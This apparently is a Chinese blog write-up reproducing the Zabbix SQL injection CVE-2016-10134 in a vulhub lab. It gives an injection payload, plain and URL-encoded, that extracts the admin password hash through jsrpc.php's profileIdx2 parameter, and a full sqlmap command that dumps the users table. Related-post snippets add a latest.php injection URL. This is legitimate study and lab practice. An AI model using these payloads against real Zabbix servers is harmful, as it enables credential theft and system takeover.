[CVE-2016-10134]zabbix sql注入实测

最新推荐文章于 2022-08-14 15:37:45 发布
最新推荐文章于 2022-08-14 15:37:45 发布
阅读量304 收藏
点赞数
分类专栏: 安全漏洞 安全测试 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013908944/article/details/109815348
版权

参考链接vulhub
目的:熟悉和复现该漏洞做治理内部发现的漏洞
漏洞注入点:profileIdx2
漏洞路由:/jsrpc.php这个文件
漏洞环境:搭建vulhub docker环境
靶场环境
环境搭建完成,默认8080端口,可以改
用brupsuite 抓包开始复现漏洞,确认漏洞是否存在,那当前用户数据用户名 user(),可见有root用户返回,证明漏洞存在。
报错注入的漏洞存在。
在这里插入图片描述

sql注入漏洞存在,下一步是取出关键信息,zabbix取出Admin的密码就可以控制该系统的所有主机了,那么开始取数据,通过zabbix相关信息查到登陆用户密码在zabbix.users 这个表中。

(select concat(alias,0x7e,passwd) from zabbix.users limit 0,1)   #关键payload
%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%61%6c%69%61%73%2c%30%78%37%65%2c%70%61%73%73%77%64%29%20%66%72%6f%6d%20%7a%61%62%62%69%78%2e%75%73%65%72%73%20%6c%69%6d%69%74%20%30%2c%31%29        #url编码后的payload

执行成功
拿到用户名Admin,密码的hash,5fce1b3e34b520afeffb37ce0 ??? 不是32位的看来被截断了(不知为什么被截断了),这没法破解信息不全,这时时候用 mid函数取hash后20位,然后做个拼接即可
重新制作payload
重新注入
取到了密码hash的后20位,520afeffb37ce08c7cd66,与前面的截断的串拼接下。得到的hash为:5fce1b3e34b520afeffb37ce08c7cd66

破解hash,拿web登陆密码
破解md5串
登陆zabbix主机
登陆成功

后记ps:
1 知道注入点后可以直接sqlmap : (动作很大会被监控)

sqlmap -u "http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=2" --batch -p "profileIdx2" -D zabbix -T users -C alias,passwd --dump

在这里插入图片描述

2 sql注入常用函数,updatexml、concat、mid等需要熟悉应用
3 0x7e字符是“~”符号,为了方便在报错注入中找出是否成功的结果加的标记

弘毅密令
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zabbix SQL注入漏洞 (CVE-2016-10134
SoulCat
01-26 7130
zabbix SQL注入漏洞(CVE-2016-10134) 漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。 漏洞版本: 2.2.x 3....
Zabbix sql注入漏洞(CVE-2016-10134)
最新发布
m0_65150886的博客
12-27 909
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
BUU一血![Zabbix]CVE-2016-10134
qq_43801002的博客
04-25 911
zabbixzabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbi...
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
m0_51186260的博客
06-21 953
zabbix-latest.php-SQL注入漏洞
zabbix(sql注入判断脚本)
weixin_30562507的博客
08-18 77
zabbix(sql注入判断脚本) #-*-coding:utf-8-*- # code by anyun.org import urllib import re def getHtml(url): page = urllib.urlopen(url) html = page.read() html = html.replace('\n', '') ...
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
Zabbix sql注入漏洞复现(CVE-2016-10134
whojoe的博客
06-06 3420
Zabbix sql注入漏洞复现(CVE-2016-10134)环境搭建 环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统 启动docker systemctl start docker 下载vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/zabbix/CVE-2016-10134/ 启
zabbix latest.php SQL注入漏洞(CVE-2016-10134
黑白的博客
12-23 261
声明 好好学习,天天向上 漏洞描述 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 影响范围 2.2.x 3.3.0-3.03 复现过程 这里使用3.0.3版本 使用vulhub /app/vulhub-master/zabbix/CVE-2016-10134 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 http://192.168.
zabbix SQL注入漏洞(CVE-2016-10134
jammny
12-04 383
漏洞详情 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。前端页面jsrpc.php的参数profileIdx2以及后端latest.php页面中的参数toggle_ids[]存在SQL注入,攻击者可以通过此漏洞 漏洞影响 Zabbix 2.2.14之前 Zabbix 3.0~3.0.4 漏洞利用 如果可以使用guest用户进行登陆,那么可以通过账号为guest密码为空进入后台,通过抓包记住自己cookie
漏洞复现----26、Zabbix latest.php SQL注入漏洞(CVE-2016-10134
七天
06-28 710
一、Zabbix概述 Zabbix 是一个企业级分布式开源监控解决方案。Zabbix 软件能够监控众多网络参数和服务器的健康度、完整性。 Zabbix由以下组件组成: 1、Server:Zabbix server 是 Zabbix软件的核心组件,agent 向其报告可用性、系统完整性信息和统计信息。server也是存储所有配置信息、统计信息和操作信息的核心存储库。 2、数据库:所有配置信息以及 Zabbix 采集到的数据都被存储在数据库中。 3、Web 界面为了从任何地方和任何平台轻松访问 Zabbix
CVE-2016-10134 zabbix 复现
m0_46580995的博客
11-02 193
注入点1 需要登录获取cooike后16位 /latest.php?output=ajax&sid=【cooike zbx——sessionid后16位】&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0) 注入点2 jsrpc.php 无需登录 /jsrpc.php?type=0&mode=1&method=screen.get&pro
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞 (CVE-2016-10134
qq_51577576的博客
08-14 3480
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
漏洞预警:zabbix再爆高危SQL注入漏洞,可获操作系统权限
寒江的专栏
08-18 1320
漏洞概述 zabbix是一个开源的企业级性能监控解决方案。 官方网站 http://www.zabbix.com zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 影响程度 攻击成本:低 危害程度
Zabbix SQL注入漏洞威胁预警通告
weixin_34244102的博客
09-01 150
Zabbix软件被爆存在SQL注入漏洞,攻击者无需登录即可通过script等功能直接获取服务器的操作系统权限,经过分析发现Zabbix默认开启了guest权限,且默认密码为空。为了帮助广大用户尽快关注这个信息,本文将会持续关注这个漏洞。 攻击难度:低。 危害程度:高。 官方通告网站如下: https://support.zabbix.com/bro...
a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624.是什么意思?
07-25
"a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624" 的意思是指一个与 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 不同的漏洞。 CVE(Common Vulnerabilities and Exposures...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值